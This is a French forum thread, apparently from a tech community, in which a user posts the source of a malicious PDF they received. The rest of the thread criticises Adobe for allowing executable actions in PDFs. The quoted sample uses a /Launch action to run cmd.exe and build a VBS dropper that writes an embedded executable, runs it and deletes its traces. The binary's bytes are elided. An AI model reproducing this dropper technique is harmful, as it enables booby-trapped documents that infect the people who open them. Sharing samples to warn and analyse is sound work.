squalyl (./8320) :
gizmodo a tellement rien à dire qu'ils repompent carrément les planches de XKCD
, heureusement qu’un collègue compréhensif me l’a transféré).
Dans le PDF, sur un script VBS :%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj
%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),c(004),c(000),c(000),c(000),c(255),c(255),[… en tout, 35328 c(xxx) …],c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f = FSO.GetFile("game.exe")
%f.Delete
%Set f = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f = FSO.GetFile("script.vbs")
%f.Delete
%'EE
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (cmd.exe)
/P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True) >> script.vbs && echo pf=f.ReadAll >> script.vbs && echo s=InStr(pf,"'SS") >> script.vbs && echo e=InStr(pf,"'EE") >> script.vbs && echo s=Mid(pf,s,e-s) >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True) >> script.vbs && echo s = Replace(s,"%","") >> script.vbs && echo z.Write(s) >> script.vbs && script.vbs && batscript.vbs
Click the "open" button to view this document:)
>>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000249388 00000 n
0000249421 00000 n
0000249545 00000 n
trailer
<<
/Size 9
/Root 1 0 RJe vous épargne le contenu du binaire embarqué %b=Array(…), tout le monde aura reconnu 35328 octets codés en décimal (0 à 255), avec en premiers caractères « 077,090 », soit « 0x4D,0x5A », soit « MZ » en ASCII, magic number d’un exécutable DOS 16 bits.
Kevin Kofler (./8328) :
Bref, c'est vraiment n'importe quoi, pourquoi Adaube permettent-ils les actions exécutables dans un PDF?
Et après des gens se plaignent que Okular ne gère pas l'intégralité des "fonctionnalités" du PDF.
PoissonPilote (./8330) :
./8328
Euh oui enfin...ne fait quand même pas passer un manque de feature pour un choix de conception, ça fait très mauvaise foi :P
Flanker (./8329) :
Parce que c'est pratique pour les gens normaux ?
Parce qu'il ne gère pas le PDF de façon aussi complète ?
Kevin Kofler (./8328) :Il en était déjà question dans le présent topic il y a 1 mois, page 259 : ./7766
Bref, c'est vraiment n'importe quoi, pourquoi Adaube permettent-ils les actions exécutables dans un PDF?
(non non, ce n’était pas un poisson d’avril).Kevin Kofler (./8333) :Flanker (./8329) :
Parce que c'est pratique pour les gens normaux ?
"Pratique" pour infecter leurs machines avec des virus, oui…
Les gens que tu appelles "normaux" sont exactement ceux pour lesquels il ne faut surtout pas proposer ce genre de fonctionnalités!Parce qu'il ne gère pas le PDF de façon aussi complète ?
Heureusement! Je n'ai pas envie de me taper un virus parce que j'ai lu un PDF!
Kevin Kofler (./8328) :
Adaube
Godzil (./8337) :
Ou Fedau(be)ra
